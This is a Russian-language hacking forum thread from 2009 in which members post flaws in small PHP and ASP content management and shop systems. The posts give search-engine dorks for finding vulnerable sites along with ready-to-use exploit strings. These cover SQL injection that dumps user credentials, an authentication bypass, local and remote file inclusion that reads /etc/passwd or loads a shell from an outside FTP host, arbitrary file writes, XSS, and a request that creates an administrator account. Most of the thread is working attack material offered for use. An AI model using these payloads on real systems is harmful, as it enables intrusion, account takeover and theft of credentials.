
15.04.2009, 14:35
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
С нами:
10787366
Репутация:
2277
|
|
Found : halkfild
Dork : "Powered By Aqua Cms"
Vendor: http://www.aquacms.net/
Advisory URL: http://crackfor.me/bugtraq/aquacms.v1.1.txt
Mail : bugtraq[d0g]crackfor.me
SQL-injections:
Need: magic quotes = off
vuln file: /droplets/functions/base.php
vuln code:
PHP код:
65:// Check the status of the orders
if(isset($_COOKIE["userSID"])) {
$sqltable = $sitename."_orders";
$selck = $_COOKIE["userSID"];
mysql_select_db($database, $dbconnect);
$query_cartcheck = "SELECT SID FROM $sqltable WHERE SID = '$selck' AND status = 1";
$cartcheck = mysql_query($query_cartcheck, $dbconnect) or die(mysql_error());
$row_cartcheck = mysql_fetch_assoc($cartcheck);
$totalRows_cartcheck = mysql_num_rows($cartcheck);
if ($totalRows_cartcheck != 0) {
$user_ip_address = $_SERVER['REMOTE_ADDR'];
$dt=date("YmdHis");
$UID="$dt$user_ip_address";
setcookie("userSID", $UID, time()+36000);
}
}
PoC: COOKIE: userSID='[foo]
Auth bypass
Need: magic quotes = off
vuln file: /admin/index.php
vuln code:
PHP код:
10:
if (isset($_POST['username']) == TRUE) {
$uusername = $_POST['username'];
$upassword = $_POST['password'];
$sqltable = $sitename."_users";
mysql_select_db($database, $dbconnect);
$query_getuser = "
SELECT *
FROM $sqltable
WHERE username = '$uusername'
AND password = '$upassword'
AND groups != ''
";
$getuser = mysql_query($query_getuser, $dbconnect) or die("Unable to select database");
$row_getuser = mysql_fetch_assoc($getuser);
$totalRows_getuser = mysql_num_rows($getuser);
if ($totalRows_getuser == 1) {
$uid = $row_getuser['id'];
$uun = $row_getuser['username'];
$ugr = $row_getuser['groups'];
$setwsuser = $uid.":".$uun.":".$ugr;
//setcookie("wsuser", $setwsuser, time()+36000, '/');
//header("Location: index.php");
}
// User logon: end
}
PoC: POST: username='[foo]
Exploit: POST: username=crackfor.me'+or+1=1+limit+1+--+
p.s. for cracking md5 hashes use http://crackfor.me - online md5 crack service (:
|
|
|

16.04.2009, 15:38
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Lil' CMS
download: http://www.lilcms.com/lilcms/lilcms2.zip
dork: "Developed from orginal code by Lil' CMS"
Произвольное чтение и запись файлов
уязвимый код:
PHP код:
if($_POST["select"] && $_POST["Submit"]=="Load") {
//Readfile
$text=file_get_contents($CPATH.$_POST["select"]);
}
if($_POST["editing"] && $_POST["Submit"]=="Update") {
//Write file
$filename = $CPATH.$_POST["editing"];
$text=$_POST["textfield"];
$fp = fopen ($filename, "w");
$text = stripslashes($text);
fwrite($fp, $text);
fclose($fp);
}
эксплуатирование:
достаточно изменить POST-пакет, отсылаемый серверу, т.е. поправить значение переменной select, в случае чтения файла(select=../../../../../../../etc/passwd), и editing, в случае записи в файл(создает файл, если файл с таким именем отсутствует)
(с) Iceangel_
Последний раз редактировалось Iceangel_; 16.04.2009 в 15:41..
|
|
|

17.04.2009, 20:13
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами:
9187097
Репутация:
158
|
|
webylon cms v 2.5
Found : fker
Vendor: http://webylon.ru/
Type vuln: SQL injection
Vulnerable scripts:
bigimg.cgi
place.cgi
bigimg_galery.cgi
Parameter:id
POC,s:
Код:
http://[target]/bigimg.cgi?id={SQL}
Код:
http://[target]/cgi/place.cgi?id={SQL}
Код:
http://[target]/bigimg_galery.cgi?id={SQL}
sample:
https://forum.antichat.ru/showpost.php?p=1229194&postcount=8915
|
|
|

19.04.2009, 09:32
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
уязвимости SCMSv1
Уязвимости SCMS
download: http://futurekast.com/fcms/php/SCMSv1.zip
dork: "Powered by SCMSv1"
LFI
уязвимый код:
PHP код:
if (!isset($_GET['p'])) { // no page specified -> load default page
include("../SCMSv1/includes/default.txt");
} else include("includes/" . $_GET['p'] . ".txt");
эксплуатирование:
Код:
index.php?p=../../../../../../../etc/passwd%00
если стоят мк, используем альтернативу нуллбайту http://raz0r.name/articles/null-byte-alternative/
(с) Iceangel_
|
|
|

20.04.2009, 21:16
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
С нами:
9010027
Репутация:
308
|
|
Bahar Download Script
D
Download: http://www.aspdepo.org/indir2.asp?id=1085
Турки жгут))
Код:
http://www.site.com/patch/aspkat.asp?kid=28%20union+select+all+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin
ltaweb Alısveris Sistem
Download: http://www.aspindir.com/goster/5631
Код:
http://shop/urunler.asp?catno=38%20union+select+all+0,1,uname, upass,4,5,6,7,8,9,10,11,12+from+users
BloofoxCMS
Download: http://www.bloofox.com/download.21.html
magic_quotes_gpc = Off
register_globals = On
LFI:
Код:
http://site/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00
wsCMS
Google dork: Powered by wsCMS
SQL Inj:
Код:
http://site.com/news.php?id=-1234+union+select+1,concat(username,char(58),user_ password)+from+phpbb_users+limit+1,1--
Blind SQL Inj:
Код:
http://site.com/news.php?id=1 and substring(@@version,1,1)=4
http://site.com/news.php?id=1 and substring(@@version,1,1)=5
Virtual War
Google Dork: Powered by Virtual War
Код:
http://site.com/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,%43%4F%4E%43%41%54%28%6D% 65%6D%62%65%72%69%64%2C%30%78%33%41%2C%6E%61%6D%65 %2C%30%78%33%41%2C%70%61%73%73%77%6F%72%64%29%2C%3 2%0A%20FROM%20vwar_member%20%20/*
Online Universal Payment System System
Код:
http://site.com/index.php?read=../../../../../../../../../../etc/passwd
Последний раз редактировалось [underwater]; 20.04.2009 в 23:59..
|
|
|

22.04.2009, 21:54
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
С нами:
9010027
Репутация:
308
|
|
eXopera
Download: http://www.exopera.be/
Уязвимость в файле product.php:
Blind SQL Inj:
Код:
http://site.com/product.php?catid=1 and substring(@@version,1,1)=4
Код:
http://site.com/product.php?catid=1 and substring(@@version,1,1)=5
cpCommerce
Download: http://cpcommerce.cpradio.org/downloads.php
Уязвимость в файле document.php:
Blind SQL Inj:
Код:
http://site.com/document.php?id_document=1 and substring(@@version,1,1)=4
Код:
http://site.com/document.php?id_document=1 and substring(@@version,1,1)=5
|
|
|

22.04.2009, 23:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами:
10077446
Репутация:
3965
|
|
CMSSite Vulnerabilities
CMSSite Vulnerabilities
Found by: Dimi4 [UASC]
Date: 22.04.09
XSS ( search.php) :
Код:
http://localhost/CMSSite/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0
LFI: admin.php
PHP код:
if(file_exists("$admin_dir/".$_REQUEST["mode"].".php") && $_REQUEST["mode"] != "delete" && $_REQUEST["mode"] != "logout")
{
include("$admin_dir/".$_REQUEST["mode"].".php");
}
Код:
/admin.php?mode=[path]//////////////////[..]
__________________
BlackHat. MoDL
|
|
|

23.04.2009, 19:17
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Limeware CMS
Сайт: http://limeware-cms.com/
SQL-injection
При magic_quotes_gpc=off
Уязвимый код:
displayNews.php
PHP код:
. . .
if (strlen($_GET['id']) > 0) {
$this->id = $_GET['id'];
} else {
$this->id = 0;
. . .
$query = sprintf("SELECT id,title,author,date,body FROM %s WHERE id = '%s'", $this->tblnews, $this->id);
$this->newsResult = $this->DB_executeQuery($query, $this->newsLink);
. . .
Эксплуатация:
site.com/index.php?type=news&block=1&id=22'+and+1=2+union+s elect+1,concat_ws(0x2F,username,password),3,4,5+fr om+tblusers--+
|
|
|

26.04.2009, 18:00
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Уязвимости Ninja Blog
Уязвимости Ninja Blog
download: http://www.ninjadesigns.co.uk/enter/blog.zip
dork: "Powered by Ninja Designs"
RFI
/entries/index.php
уязвимый код:
PHP код:
<?php
if (isset($_GET["cat"])) {
$page = $_GET["cat"].'.txt';
if (file_exists($page)) {
echo "<br /><a href=\"index.php\">< Back</a>";
@include ("$page");
эксплуатирование:
Код:
/entries/index.php?cat=ftp://login:pwd@host/shell.txt%00
(с) Iceangel_
Последний раз редактировалось Iceangel_; 26.04.2009 в 18:32..
|
|
|

26.04.2009, 23:09
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
TeamCal Pro Version 3.2.003
Downloads:http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112& Itemid=45
Dork:Powered by TeamCal
можем добавить админа
уязвимый код
/addprofile.php
Код:
/**
* Check if allowed
*/
if (!checkAuth("admin")) {
// Not authorized. Get outta here
jsReload("index.php"); <- тут java-redirect!
}
эксплуатация:
Код:
/addprofile.php
отправляем POST запрос типа
username=1234567&password=1234&password2=1234&lastname=&firstname=&title=&position=&idnumber=&phone=&mobile=&email=&birthday=&opt_gender=ut_male&uo_language=english&uo_defgroup=default&lbxNotifyGroup=All&opt_usertype=ut_admin&custom1=&custom2=&custom3=&custom4=&custom5=&customFree=&customPopup=&btn_add=Add
все
admin:1234567
pass:1234
(с)Rubaka
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|